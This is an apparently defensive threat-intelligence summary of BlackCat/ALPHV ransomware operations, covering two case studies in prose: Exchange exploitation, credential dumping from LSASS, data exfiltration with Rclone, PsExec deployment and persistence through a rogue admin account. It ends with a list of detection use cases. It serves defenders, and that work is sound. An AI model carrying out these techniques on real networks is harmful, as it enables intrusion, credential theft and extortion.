June 21, 2022

 

Analyzing BlackCat Ransomware Attacks & Operations

Industry: N/A | Level: Tactical | Source: Microsoft

Microsoft’s tracking of Blackcat/ALPHV ransomware gang has identified an adaptable group of operators utilizing various tactics, techniques, and procedures (TTPs) in their campaigns. Initial access has varied from the group leveraging either stolen credentials or exploits such as Microsoft Exchange server vulnerabilities. Two case studies are presented by Microsoft demonstrating an attack from Blackcat. The first case study involves the operators compromising an unpatched Microsoft Exchange server. Once the network has been breached, the attackers initiate reconnaissance with native tools such as net.exe, while also utilizing AdFind. The threat actors proceeded with obtaining credentials from LSASS, moving laterally to network hosts, and exfiltrating valuable data with RClone and/or MEGASync. The attack spanned over two weeks ending with ransomware deployment executed with remote admin tool, PsExec. In the second use case, the attacker gained initial access using compromised credentials. The attackers initiated discovery with native tools like the first case study. Lateral movement was achieved with downloaded software such as ScreenConnect/ConnectWise. Credentials were obtained by modifying the registry to allow cleartext authentication and credentials were dumped from LSASS using Task Manager. Mimikatz was also observed in the attack however not until 8 hours later. Prior to ransomware deployment, the attackers created persistence by creating a user and adding them to the local administrator group. The account also enables the ransomware group to initiate an attack against the organization again if the victim had not fully remediated.

Anvilogic Scenario:

  • Registry modification for Credential Access and RDP

Anvilogic Use Cases:

  • Service Stop Commands
  • Inhibit System Recovery Commands
  • Registry key added with reg.exe
  • Clear Windows Event Logs
  • Rclone Execution
  • Adfind Execution